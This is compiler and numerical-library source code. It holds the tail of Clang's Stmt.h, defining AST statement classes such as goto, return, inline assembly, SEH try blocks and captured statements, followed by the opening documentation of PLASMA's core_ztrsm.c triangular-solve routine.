Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
Expr *getInc() { return reinterpret_cast<Expr*>(SubExprs[INC]); }
Stmt *getBody() { return SubExprs[BODY]; }
const Stmt *getInit() const { return SubExprs[INIT]; }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
const Expr *getInc() const { return reinterpret_cast<Expr*>(SubExprs[INC]); }
const Stmt *getBody() const { return SubExprs[BODY]; }
void setInit(Stmt *S) { SubExprs[INIT] = S; }
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt*>(E); }
void setInc(Expr *E) { SubExprs[INC] = reinterpret_cast<Stmt*>(E); }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SourceLocation getForLoc() const { return ForLoc; }
void setForLoc(SourceLocation L) { ForLoc = L; }
SourceLocation getLParenLoc() const { return LParenLoc; }
void setLParenLoc(SourceLocation L) { LParenLoc = L; }
SourceLocation getRParenLoc() const { return RParenLoc; }
void setRParenLoc(SourceLocation L) { RParenLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return ForLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return SubExprs[BODY]->getLocEnd();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == ForStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
};
/// GotoStmt - This represents a direct goto.
class GotoStmt : public Stmt {
LabelDecl *Label;
SourceLocation GotoLoc;
SourceLocation LabelLoc;
public:
GotoStmt(LabelDecl *label, SourceLocation GL, SourceLocation LL)
: Stmt(GotoStmtClass), Label(label), GotoLoc(GL), LabelLoc(LL) {}
/// \brief Build an empty goto statement.
explicit GotoStmt(EmptyShell Empty) : Stmt(GotoStmtClass, Empty) {}
LabelDecl *getLabel() const { return Label; }
void setLabel(LabelDecl *D) { Label = D; }
SourceLocation getGotoLoc() const { return GotoLoc; }
void setGotoLoc(SourceLocation L) { GotoLoc = L; }
SourceLocation getLabelLoc() const { return LabelLoc; }
void setLabelLoc(SourceLocation L) { LabelLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return GotoLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return LabelLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == GotoStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// IndirectGotoStmt - This represents an indirect goto.
class IndirectGotoStmt : public Stmt {
SourceLocation GotoLoc;
SourceLocation StarLoc;
Stmt *Target;
public:
IndirectGotoStmt(SourceLocation gotoLoc, SourceLocation starLoc,
Expr *target)
: Stmt(IndirectGotoStmtClass), GotoLoc(gotoLoc), StarLoc(starLoc),
Target((Stmt*)target) {}
/// \brief Build an empty indirect goto statement.
explicit IndirectGotoStmt(EmptyShell Empty)
: Stmt(IndirectGotoStmtClass, Empty) {}
void setGotoLoc(SourceLocation L) { GotoLoc = L; }
SourceLocation getGotoLoc() const { return GotoLoc; }
void setStarLoc(SourceLocation L) { StarLoc = L; }
SourceLocation getStarLoc() const { return StarLoc; }
Expr *getTarget() { return reinterpret_cast<Expr*>(Target); }
const Expr *getTarget() const {return reinterpret_cast<const Expr*>(Target);}
void setTarget(Expr *E) { Target = reinterpret_cast<Stmt*>(E); }
/// getConstantTarget - Returns the fixed target of this indirect
/// goto, if one exists.
LabelDecl *getConstantTarget();
const LabelDecl *getConstantTarget() const {
return const_cast<IndirectGotoStmt*>(this)->getConstantTarget();
}
SourceLocation getLocStart() const LLVM_READONLY { return GotoLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return Target->getLocEnd(); }
static bool classof(const Stmt *T) {
return T->getStmtClass() == IndirectGotoStmtClass;
}
// Iterators
child_range children() { return child_range(&Target, &Target+1); }
};
/// ContinueStmt - This represents a continue.
class ContinueStmt : public Stmt {
SourceLocation ContinueLoc;
public:
ContinueStmt(SourceLocation CL) : Stmt(ContinueStmtClass), ContinueLoc(CL) {}
/// \brief Build an empty continue statement.
explicit ContinueStmt(EmptyShell Empty) : Stmt(ContinueStmtClass, Empty) {}
SourceLocation getContinueLoc() const { return ContinueLoc; }
void setContinueLoc(SourceLocation L) { ContinueLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return ContinueLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return ContinueLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == ContinueStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// BreakStmt - This represents a break.
class BreakStmt : public Stmt {
SourceLocation BreakLoc;
public:
BreakStmt(SourceLocation BL) : Stmt(BreakStmtClass), BreakLoc(BL) {
static_assert(sizeof(BreakStmt) == 2 * sizeof(SourceLocation),
"BreakStmt too large");
}
/// \brief Build an empty break statement.
explicit BreakStmt(EmptyShell Empty) : Stmt(BreakStmtClass, Empty) {}
SourceLocation getBreakLoc() const { return BreakLoc; }
void setBreakLoc(SourceLocation L) { BreakLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return BreakLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return BreakLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == BreakStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// ReturnStmt - This represents a return, optionally of an expression:
/// return;
/// return 4;
///
/// Note that GCC allows return with no argument in a function declared to
/// return a value, and it allows returning a value in functions declared to
/// return void. We explicitly model this in the AST, which means you can't
/// depend on the return type of the function and the presence of an argument.
class ReturnStmt : public Stmt {
SourceLocation RetLoc;
Stmt *RetExpr;
const VarDecl *NRVOCandidate;
public:
explicit ReturnStmt(SourceLocation RL) : ReturnStmt(RL, nullptr, nullptr) {}
ReturnStmt(SourceLocation RL, Expr *E, const VarDecl *NRVOCandidate)
: Stmt(ReturnStmtClass), RetLoc(RL), RetExpr((Stmt *)E),
NRVOCandidate(NRVOCandidate) {}
/// \brief Build an empty return expression.
explicit ReturnStmt(EmptyShell Empty) : Stmt(ReturnStmtClass, Empty) {}
const Expr *getRetValue() const;
Expr *getRetValue();
void setRetValue(Expr *E) { RetExpr = reinterpret_cast<Stmt*>(E); }
SourceLocation getReturnLoc() const { return RetLoc; }
void setReturnLoc(SourceLocation L) { RetLoc = L; }
/// \brief Retrieve the variable that might be used for the named return
/// value optimization.
///
/// The optimization itself can only be performed if the variable is
/// also marked as an NRVO object.
const VarDecl *getNRVOCandidate() const { return NRVOCandidate; }
void setNRVOCandidate(const VarDecl *Var) { NRVOCandidate = Var; }
SourceLocation getLocStart() const LLVM_READONLY { return RetLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return RetExpr ? RetExpr->getLocEnd() : RetLoc;
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == ReturnStmtClass;
}
// Iterators
child_range children() {
if (RetExpr) return child_range(&RetExpr, &RetExpr+1);
return child_range(child_iterator(), child_iterator());
}
};
/// AsmStmt is the base class for GCCAsmStmt and MSAsmStmt.
class AsmStmt : public Stmt {
protected:
friend class ASTStmtReader;
SourceLocation AsmLoc;
/// \brief True if the assembly statement does not have any input or output
/// operands.
bool IsSimple;
/// \brief If true, treat this inline assembly as having side effects.
/// This assembly statement should not be optimized, deleted or moved.
bool IsVolatile;
unsigned NumOutputs;
unsigned NumInputs;
unsigned NumClobbers;
Stmt **Exprs = nullptr;
AsmStmt(StmtClass SC, SourceLocation asmloc, bool issimple, bool isvolatile,
unsigned numoutputs, unsigned numinputs, unsigned numclobbers)
: Stmt (SC), AsmLoc(asmloc), IsSimple(issimple), IsVolatile(isvolatile),
NumOutputs(numoutputs), NumInputs(numinputs),
NumClobbers(numclobbers) {}
public:
/// \brief Build an empty inline-assembly statement.
explicit AsmStmt(StmtClass SC, EmptyShell Empty) : Stmt(SC, Empty) {}
SourceLocation getAsmLoc() const { return AsmLoc; }
void setAsmLoc(SourceLocation L) { AsmLoc = L; }
bool isSimple() const { return IsSimple; }
void setSimple(bool V) { IsSimple = V; }
bool isVolatile() const { return IsVolatile; }
void setVolatile(bool V) { IsVolatile = V; }
SourceLocation getLocStart() const LLVM_READONLY { return SourceLocation(); }
SourceLocation getLocEnd() const LLVM_READONLY { return SourceLocation(); }
//===--- Asm String Analysis ---===//
/// Assemble final IR asm string.
std::string generateAsmString(const ASTContext &C) const;
//===--- Output operands ---===//
unsigned getNumOutputs() const { return NumOutputs; }
/// getOutputConstraint - Return the constraint string for the specified
/// output operand. All output constraints are known to be non-empty (either
/// '=' or '+').
StringRef getOutputConstraint(unsigned i) const;
/// isOutputPlusConstraint - Return true if the specified output constraint
/// is a "+" constraint (which is both an input and an output) or false if it
/// is an "=" constraint (just an output).
bool isOutputPlusConstraint(unsigned i) const {
return getOutputConstraint(i)[0] == '+';
}
const Expr *getOutputExpr(unsigned i) const;
/// getNumPlusOperands - Return the number of output operands that have a "+"
/// constraint.
unsigned getNumPlusOperands() const;
//===--- Input operands ---===//
unsigned getNumInputs() const { return NumInputs; }
/// getInputConstraint - Return the specified input constraint. Unlike output
/// constraints, these can be empty.
StringRef getInputConstraint(unsigned i) const;
const Expr *getInputExpr(unsigned i) const;
//===--- Other ---===//
unsigned getNumClobbers() const { return NumClobbers; }
StringRef getClobber(unsigned i) const;
static bool classof(const Stmt *T) {
return T->getStmtClass() == GCCAsmStmtClass ||
T->getStmtClass() == MSAsmStmtClass;
}
// Input expr iterators.
using inputs_iterator = ExprIterator;
using const_inputs_iterator = ConstExprIterator;
using inputs_range = llvm::iterator_range<inputs_iterator>;
using inputs_const_range = llvm::iterator_range<const_inputs_iterator>;
inputs_iterator begin_inputs() {
return &Exprs[0] + NumOutputs;
}
inputs_iterator end_inputs() {
return &Exprs[0] + NumOutputs + NumInputs;
}
inputs_range inputs() { return inputs_range(begin_inputs(), end_inputs()); }
const_inputs_iterator begin_inputs() const {
return &Exprs[0] + NumOutputs;
}
const_inputs_iterator end_inputs() const {
return &Exprs[0] + NumOutputs + NumInputs;
}
inputs_const_range inputs() const {
return inputs_const_range(begin_inputs(), end_inputs());
}
// Output expr iterators.
using outputs_iterator = ExprIterator;
using const_outputs_iterator = ConstExprIterator;
using outputs_range = llvm::iterator_range<outputs_iterator>;
using outputs_const_range = llvm::iterator_range<const_outputs_iterator>;
outputs_iterator begin_outputs() {
return &Exprs[0];
}
outputs_iterator end_outputs() {
return &Exprs[0] + NumOutputs;
}
outputs_range outputs() {
return outputs_range(begin_outputs(), end_outputs());
}
const_outputs_iterator begin_outputs() const {
return &Exprs[0];
}
const_outputs_iterator end_outputs() const {
return &Exprs[0] + NumOutputs;
}
outputs_const_range outputs() const {
return outputs_const_range(begin_outputs(), end_outputs());
}
child_range children() {
return child_range(&Exprs[0], &Exprs[0] + NumOutputs + NumInputs);
}
};
/// This represents a GCC inline-assembly statement extension.
class GCCAsmStmt : public AsmStmt {
friend class ASTStmtReader;
SourceLocation RParenLoc;
StringLiteral *AsmStr;
// FIXME: If we wanted to, we could allocate all of these in one big array.
StringLiteral **Constraints = nullptr;
StringLiteral **Clobbers = nullptr;
IdentifierInfo **Names = nullptr;
public:
GCCAsmStmt(const ASTContext &C, SourceLocation asmloc, bool issimple,
bool isvolatile, unsigned numoutputs, unsigned numinputs,
IdentifierInfo **names, StringLiteral **constraints, Expr **exprs,
StringLiteral *asmstr, unsigned numclobbers,
StringLiteral **clobbers, SourceLocation rparenloc);
/// \brief Build an empty inline-assembly statement.
explicit GCCAsmStmt(EmptyShell Empty) : AsmStmt(GCCAsmStmtClass, Empty) {}
SourceLocation getRParenLoc() const { return RParenLoc; }
void setRParenLoc(SourceLocation L) { RParenLoc = L; }
//===--- Asm String Analysis ---===//
const StringLiteral *getAsmString() const { return AsmStr; }
StringLiteral *getAsmString() { return AsmStr; }
void setAsmString(StringLiteral *E) { AsmStr = E; }
/// AsmStringPiece - this is part of a decomposed asm string specification
/// (for use with the AnalyzeAsmString function below). An asm string is
/// considered to be a concatenation of these parts.
class AsmStringPiece {
public:
enum Kind {
String, // String in .ll asm string form, "$" -> "$$" and "%%" -> "%".
Operand // Operand reference, with optional modifier %c4.
};
private:
Kind MyKind;
std::string Str;
unsigned OperandNo;
// Source range for operand references.
CharSourceRange Range;
public:
AsmStringPiece(const std::string &S) : MyKind(String), Str(S) {}
AsmStringPiece(unsigned OpNo, const std::string &S, SourceLocation Begin,
SourceLocation End)
: MyKind(Operand), Str(S), OperandNo(OpNo),
Range(CharSourceRange::getCharRange(Begin, End)) {}
bool isString() const { return MyKind == String; }
bool isOperand() const { return MyKind == Operand; }
const std::string &getString() const {
return Str;
}
unsigned getOperandNo() const {
assert(isOperand());
return OperandNo;
}
CharSourceRange getRange() const {
assert(isOperand() && "Range is currently used only for Operands.");
return Range;
}
/// getModifier - Get the modifier for this operand, if present. This
/// returns '\0' if there was no modifier.
char getModifier() const;
};
/// AnalyzeAsmString - Analyze the asm string of the current asm, decomposing
/// it into pieces. If the asm string is erroneous, emit errors and return
/// true, otherwise return false. This handles canonicalization and
/// translation of strings from GCC syntax to LLVM IR syntax, and handles
/// flattening of named references like %[foo] to Operand AsmStringPiece's.
unsigned AnalyzeAsmString(SmallVectorImpl<AsmStringPiece> &Pieces,
const ASTContext &C, unsigned &DiagOffs) const;
/// Assemble final IR asm string.
std::string generateAsmString(const ASTContext &C) const;
//===--- Output operands ---===//
IdentifierInfo *getOutputIdentifier(unsigned i) const {
return Names[i];
}
StringRef getOutputName(unsigned i) const {
if (IdentifierInfo *II = getOutputIdentifier(i))
return II->getName();
return StringRef();
}
StringRef getOutputConstraint(unsigned i) const;
const StringLiteral *getOutputConstraintLiteral(unsigned i) const {
return Constraints[i];
}
StringLiteral *getOutputConstraintLiteral(unsigned i) {
return Constraints[i];
}
Expr *getOutputExpr(unsigned i);
const Expr *getOutputExpr(unsigned i) const {
return const_cast<GCCAsmStmt*>(this)->getOutputExpr(i);
}
//===--- Input operands ---===//
IdentifierInfo *getInputIdentifier(unsigned i) const {
return Names[i + NumOutputs];
}
StringRef getInputName(unsigned i) const {
if (IdentifierInfo *II = getInputIdentifier(i))
return II->getName();
return StringRef();
}
StringRef getInputConstraint(unsigned i) const;
const StringLiteral *getInputConstraintLiteral(unsigned i) const {
return Constraints[i + NumOutputs];
}
StringLiteral *getInputConstraintLiteral(unsigned i) {
return Constraints[i + NumOutputs];
}
Expr *getInputExpr(unsigned i);
void setInputExpr(unsigned i, Expr *E);
const Expr *getInputExpr(unsigned i) const {
return const_cast<GCCAsmStmt*>(this)->getInputExpr(i);
}
private:
void setOutputsAndInputsAndClobbers(const ASTContext &C,
IdentifierInfo **Names,
StringLiteral **Constraints,
Stmt **Exprs,
unsigned NumOutputs,
unsigned NumInputs,
StringLiteral **Clobbers,
unsigned NumClobbers);
public:
//===--- Other ---===//
/// getNamedOperand - Given a symbolic operand reference like %[foo],
/// translate this into a numeric value needed to reference the same operand.
/// This returns -1 if the operand name is invalid.
int getNamedOperand(StringRef SymbolicName) const;
StringRef getClobber(unsigned i) const;
StringLiteral *getClobberStringLiteral(unsigned i) { return Clobbers[i]; }
const StringLiteral *getClobberStringLiteral(unsigned i) const {
return Clobbers[i];
}
SourceLocation getLocStart() const LLVM_READONLY { return AsmLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return RParenLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == GCCAsmStmtClass;
}
};
/// This represents a Microsoft inline-assembly statement extension.
class MSAsmStmt : public AsmStmt {
friend class ASTStmtReader;
SourceLocation LBraceLoc, EndLoc;
StringRef AsmStr;
unsigned NumAsmToks = 0;
Token *AsmToks = nullptr;
StringRef *Constraints = nullptr;
StringRef *Clobbers = nullptr;
public:
MSAsmStmt(const ASTContext &C, SourceLocation asmloc,
SourceLocation lbraceloc, bool issimple, bool isvolatile,
ArrayRef<Token> asmtoks, unsigned numoutputs, unsigned numinputs,
ArrayRef<StringRef> constraints,
ArrayRef<Expr*> exprs, StringRef asmstr,
ArrayRef<StringRef> clobbers, SourceLocation endloc);
/// \brief Build an empty MS-style inline-assembly statement.
explicit MSAsmStmt(EmptyShell Empty) : AsmStmt(MSAsmStmtClass, Empty) {}
SourceLocation getLBraceLoc() const { return LBraceLoc; }
void setLBraceLoc(SourceLocation L) { LBraceLoc = L; }
SourceLocation getEndLoc() const { return EndLoc; }
void setEndLoc(SourceLocation L) { EndLoc = L; }
bool hasBraces() const { return LBraceLoc.isValid(); }
unsigned getNumAsmToks() { return NumAsmToks; }
Token *getAsmToks() { return AsmToks; }
//===--- Asm String Analysis ---===//
StringRef getAsmString() const { return AsmStr; }
/// Assemble final IR asm string.
std::string generateAsmString(const ASTContext &C) const;
//===--- Output operands ---===//
StringRef getOutputConstraint(unsigned i) const {
assert(i < NumOutputs);
return Constraints[i];
}
Expr *getOutputExpr(unsigned i);
const Expr *getOutputExpr(unsigned i) const {
return const_cast<MSAsmStmt*>(this)->getOutputExpr(i);
}
//===--- Input operands ---===//
StringRef getInputConstraint(unsigned i) const {
assert(i < NumInputs);
return Constraints[i + NumOutputs];
}
Expr *getInputExpr(unsigned i);
void setInputExpr(unsigned i, Expr *E);
const Expr *getInputExpr(unsigned i) const {
return const_cast<MSAsmStmt*>(this)->getInputExpr(i);
}
//===--- Other ---===//
ArrayRef<StringRef> getAllConstraints() const {
return llvm::makeArrayRef(Constraints, NumInputs + NumOutputs);
}
ArrayRef<StringRef> getClobbers() const {
return llvm::makeArrayRef(Clobbers, NumClobbers);
}
ArrayRef<Expr*> getAllExprs() const {
return llvm::makeArrayRef(reinterpret_cast<Expr**>(Exprs),
NumInputs + NumOutputs);
}
StringRef getClobber(unsigned i) const { return getClobbers()[i]; }
private:
void initialize(const ASTContext &C, StringRef AsmString,
ArrayRef<Token> AsmToks, ArrayRef<StringRef> Constraints,
ArrayRef<Expr*> Exprs, ArrayRef<StringRef> Clobbers);
public:
SourceLocation getLocStart() const LLVM_READONLY { return AsmLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return EndLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == MSAsmStmtClass;
}
child_range children() {
return child_range(&Exprs[0], &Exprs[NumInputs + NumOutputs]);
}
};
class SEHExceptStmt : public Stmt {
friend class ASTReader;
friend class ASTStmtReader;
SourceLocation Loc;
Stmt *Children[2];
enum { FILTER_EXPR, BLOCK };
SEHExceptStmt(SourceLocation Loc, Expr *FilterExpr, Stmt *Block);
explicit SEHExceptStmt(EmptyShell E) : Stmt(SEHExceptStmtClass, E) {}
public:
static SEHExceptStmt* Create(const ASTContext &C,
SourceLocation ExceptLoc,
Expr *FilterExpr,
Stmt *Block);
SourceLocation getLocStart() const LLVM_READONLY { return getExceptLoc(); }
SourceLocation getLocEnd() const LLVM_READONLY { return getEndLoc(); }
SourceLocation getExceptLoc() const { return Loc; }
SourceLocation getEndLoc() const { return getBlock()->getLocEnd(); }
Expr *getFilterExpr() const {
return reinterpret_cast<Expr*>(Children[FILTER_EXPR]);
}
CompoundStmt *getBlock() const {
return cast<CompoundStmt>(Children[BLOCK]);
}
child_range children() {
return child_range(Children,Children+2);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHExceptStmtClass;
}
};
class SEHFinallyStmt : public Stmt {
friend class ASTReader;
friend class ASTStmtReader;
SourceLocation Loc;
Stmt *Block;
SEHFinallyStmt(SourceLocation Loc, Stmt *Block);
explicit SEHFinallyStmt(EmptyShell E) : Stmt(SEHFinallyStmtClass, E) {}
public:
static SEHFinallyStmt* Create(const ASTContext &C,
SourceLocation FinallyLoc,
Stmt *Block);
SourceLocation getLocStart() const LLVM_READONLY { return getFinallyLoc(); }
SourceLocation getLocEnd() const LLVM_READONLY { return getEndLoc(); }
SourceLocation getFinallyLoc() const { return Loc; }
SourceLocation getEndLoc() const { return Block->getLocEnd(); }
CompoundStmt *getBlock() const { return cast<CompoundStmt>(Block); }
child_range children() {
return child_range(&Block,&Block+1);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHFinallyStmtClass;
}
};
class SEHTryStmt : public Stmt {
friend class ASTReader;
friend class ASTStmtReader;
bool IsCXXTry;
SourceLocation TryLoc;
Stmt *Children[2];
enum { TRY = 0, HANDLER = 1 };
SEHTryStmt(bool isCXXTry, // true if 'try' otherwise '__try'
SourceLocation TryLoc,
Stmt *TryBlock,
Stmt *Handler);
explicit SEHTryStmt(EmptyShell E) : Stmt(SEHTryStmtClass, E) {}
public:
static SEHTryStmt* Create(const ASTContext &C, bool isCXXTry,
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
SourceLocation getLocStart() const LLVM_READONLY { return getTryLoc(); }
SourceLocation getLocEnd() const LLVM_READONLY { return getEndLoc(); }
SourceLocation getTryLoc() const { return TryLoc; }
SourceLocation getEndLoc() const { return Children[HANDLER]->getLocEnd(); }
bool getIsCXXTry() const { return IsCXXTry; }
CompoundStmt* getTryBlock() const {
return cast<CompoundStmt>(Children[TRY]);
}
Stmt *getHandler() const { return Children[HANDLER]; }
/// Returns 0 if not defined
SEHExceptStmt *getExceptHandler() const;
SEHFinallyStmt *getFinallyHandler() const;
child_range children() {
return child_range(Children,Children+2);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHTryStmtClass;
}
};
/// Represents a __leave statement.
class SEHLeaveStmt : public Stmt {
SourceLocation LeaveLoc;
public:
explicit SEHLeaveStmt(SourceLocation LL)
: Stmt(SEHLeaveStmtClass), LeaveLoc(LL) {}
/// \brief Build an empty __leave statement.
explicit SEHLeaveStmt(EmptyShell Empty) : Stmt(SEHLeaveStmtClass, Empty) {}
SourceLocation getLeaveLoc() const { return LeaveLoc; }
void setLeaveLoc(SourceLocation L) { LeaveLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return LeaveLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return LeaveLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHLeaveStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// \brief This captures a statement into a function. For example, the following
/// pragma annotated compound statement can be represented as a CapturedStmt,
/// and this compound statement is the body of an anonymous outlined function.
/// @code
/// #pragma omp parallel
/// {
/// compute();
/// }
/// @endcode
class CapturedStmt : public Stmt {
public:
/// \brief The different capture forms: by 'this', by reference, capture for
/// variable-length array type etc.
enum VariableCaptureKind {
VCK_This,
VCK_ByRef,
VCK_ByCopy,
VCK_VLAType,
};
/// \brief Describes the capture of either a variable, or 'this', or
/// variable-length array type.
class Capture {
llvm::PointerIntPair<VarDecl *, 2, VariableCaptureKind> VarAndKind;
SourceLocation Loc;
public:
friend class ASTStmtReader;
/// \brief Create a new capture.
///
/// \param Loc The source location associated with this capture.
///
/// \param Kind The kind of capture (this, ByRef, ...).
///
/// \param Var The variable being captured, or null if capturing this.
Capture(SourceLocation Loc, VariableCaptureKind Kind,
VarDecl *Var = nullptr);
/// \brief Determine the kind of capture.
VariableCaptureKind getCaptureKind() const;
/// \brief Retrieve the source location at which the variable or 'this' was
/// first used.
SourceLocation getLocation() const { return Loc; }
/// \brief Determine whether this capture handles the C++ 'this' pointer.
bool capturesThis() const { return getCaptureKind() == VCK_This; }
/// \brief Determine whether this capture handles a variable (by reference).
bool capturesVariable() const { return getCaptureKind() == VCK_ByRef; }
/// \brief Determine whether this capture handles a variable by copy.
bool capturesVariableByCopy() const {
return getCaptureKind() == VCK_ByCopy;
}
/// \brief Determine whether this capture handles a variable-length array
/// type.
bool capturesVariableArrayType() const {
return getCaptureKind() == VCK_VLAType;
}
/// \brief Retrieve the declaration of the variable being captured.
///
/// This operation is only valid if this capture captures a variable.
VarDecl *getCapturedVar() const;
};
private:
/// \brief The number of variables captured, including 'this'.
unsigned NumCaptures;
/// \brief The pointer part is the implicitly-generated outlined function and
/// the int part is the captured region kind, 'CR_Default' etc.
llvm::PointerIntPair<CapturedDecl *, 1, CapturedRegionKind> CapDeclAndKind;
/// \brief The record for captured variables, a RecordDecl or CXXRecordDecl.
RecordDecl *TheRecordDecl = nullptr;
/// \brief Construct a captured statement.
CapturedStmt(Stmt *S, CapturedRegionKind Kind, ArrayRef<Capture> Captures,
ArrayRef<Expr *> CaptureInits, CapturedDecl *CD, RecordDecl *RD);
/// \brief Construct an empty captured statement.
CapturedStmt(EmptyShell Empty, unsigned NumCaptures);
Stmt **getStoredStmts() { return reinterpret_cast<Stmt **>(this + 1); }
Stmt *const *getStoredStmts() const {
return reinterpret_cast<Stmt *const *>(this + 1);
}
Capture *getStoredCaptures() const;
void setCapturedStmt(Stmt *S) { getStoredStmts()[NumCaptures] = S; }
public:
friend class ASTStmtReader;
static CapturedStmt *Create(const ASTContext &Context, Stmt *S,
CapturedRegionKind Kind,
ArrayRef<Capture> Captures,
ArrayRef<Expr *> CaptureInits,
CapturedDecl *CD, RecordDecl *RD);
static CapturedStmt *CreateDeserialized(const ASTContext &Context,
unsigned NumCaptures);
/// \brief Retrieve the statement being captured.
Stmt *getCapturedStmt() { return getStoredStmts()[NumCaptures]; }
const Stmt *getCapturedStmt() const { return getStoredStmts()[NumCaptures]; }
/// \brief Retrieve the outlined function declaration.
CapturedDecl *getCapturedDecl();
const CapturedDecl *getCapturedDecl() const;
/// \brief Set the outlined function declaration.
void setCapturedDecl(CapturedDecl *D);
/// \brief Retrieve the captured region kind.
CapturedRegionKind getCapturedRegionKind() const;
/// \brief Set the captured region kind.
void setCapturedRegionKind(CapturedRegionKind Kind);
/// \brief Retrieve the record declaration for captured variables.
const RecordDecl *getCapturedRecordDecl() const { return TheRecordDecl; }
/// \brief Set the record declaration for captured variables.
void setCapturedRecordDecl(RecordDecl *D) {
assert(D && "null RecordDecl");
TheRecordDecl = D;
}
/// \brief True if this variable has been captured.
bool capturesVariable(const VarDecl *Var) const;
/// \brief An iterator that walks over the captures.
using capture_iterator = Capture *;
using const_capture_iterator = const Capture *;
using capture_range = llvm::iterator_range<capture_iterator>;
using capture_const_range = llvm::iterator_range<const_capture_iterator>;
capture_range captures() {
return capture_range(capture_begin(), capture_end());
}
capture_const_range captures() const {
return capture_const_range(capture_begin(), capture_end());
}
/// \brief Retrieve an iterator pointing to the first capture.
capture_iterator capture_begin() { return getStoredCaptures(); }
const_capture_iterator capture_begin() const { return getStoredCaptures(); }
/// \brief Retrieve an iterator pointing past the end of the sequence of
/// captures.
capture_iterator capture_end() const {
return getStoredCaptures() + NumCaptures;
}
/// \brief Retrieve the number of captures, including 'this'.
unsigned capture_size() const { return NumCaptures; }
/// \brief Iterator that walks over the capture initialization arguments.
using capture_init_iterator = Expr **;
using capture_init_range = llvm::iterator_range<capture_init_iterator>;
/// \brief Const iterator that walks over the capture initialization
/// arguments.
using const_capture_init_iterator = Expr *const *;
using const_capture_init_range =
llvm::iterator_range<const_capture_init_iterator>;
capture_init_range capture_inits() {
return capture_init_range(capture_init_begin(), capture_init_end());
}
const_capture_init_range capture_inits() const {
return const_capture_init_range(capture_init_begin(), capture_init_end());
}
/// \brief Retrieve the first initialization argument.
capture_init_iterator capture_init_begin() {
return reinterpret_cast<Expr **>(getStoredStmts());
}
const_capture_init_iterator capture_init_begin() const {
return reinterpret_cast<Expr *const *>(getStoredStmts());
}
/// \brief Retrieve the iterator pointing one past the last initialization
/// argument.
capture_init_iterator capture_init_end() {
return capture_init_begin() + NumCaptures;
}
const_capture_init_iterator capture_init_end() const {
return capture_init_begin() + NumCaptures;
}
SourceLocation getLocStart() const LLVM_READONLY {
return getCapturedStmt()->getLocStart();
}
SourceLocation getLocEnd() const LLVM_READONLY {
return getCapturedStmt()->getLocEnd();
}
SourceRange getSourceRange() const LLVM_READONLY {
return getCapturedStmt()->getSourceRange();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == CapturedStmtClass;
}
child_range children();
};
} // namespace clang
#endif // LLVM_CLANG_AST_STMT_H
|
core_ztrsm.c | /**
*
* @file
*
* PLASMA is a software package provided by:
* University of Tennessee, US,
* University of Manchester, UK.
*
* @precisions normal z -> c d s
*
**/
#include <plasma_core_blas.h>
#include "plasma_types.h"
#include "core_lapack.h"
/***************************************************************************//**
*
* @ingroup core_trsm
*
* Solves one of the matrix equations
*
* \f[ op( A )\times X = \alpha B, \f] or
* \f[ X \times op( A ) = \alpha B, \f]
*
* where op( A ) is one of:
* \f[ op( A ) = A, \f]
* \f[ op( A ) = A^T, \f]
* \f[ op( A ) = A^H, \f]
*
* alpha is a scalar, X and B are m-by-n matrices, and
* A is a unit or non-unit, upper or lower triangular matrix.
* The matrix X overwrites B.
*
*******************************************************************************
*
* @param[in] side
* - PlasmaLeft: op(A)*X = B,
* - PlasmaRight: X*op(A) = B.
*
* @param[in] uplo
* - PlasmaUpper: A is upper triangular,
* - PlasmaLower: A is lower triangular.
*
* @param[in] transa
* - PlasmaNoTrans: A is not transposed,
* - PlasmaTrans: A is transposed,
* - PlasmaConjTrans: A is conjugate transposed.
*
* @param[in] diag
* - PlasmaNonUnit: A has non-unit diagonal,
* - PlasmaUnit: A has unit diagonal.
*
* @param[in] m
* The number of rows of the matrix B. m >= 0.
*
* @param[in] n
* The number of columns of the matrix B. n >= 0.
*
* @param[in] alpha
* The scalar alpha.
*
* @param[in] A
* The lda-by-ka triangular matrix,
* where ka = m if side = PlasmaLeft,
* and ka = n if side = PlasmaRight.
* If uplo = PlasmaUpper, the leading ka-by-ka upper triangular part
* of the array A contains the upper triangular matrix, and the
* strictly lower triangular part of A is not referenced.
* If uplo = PlasmaLower, the leading ka-by-ka lower triangular part
* of the array A contains the lower triangular matrix, and the
* strictly upper triangular part of A is not referenced.
* If diag = PlasmaUnit, the diagonal elements of A are also not
* referenced and are assumed to be 1.
*
* @param[in] lda
* The leading dimension of the array A. lda >= max(1,ka).
*
* @param[in,out] B
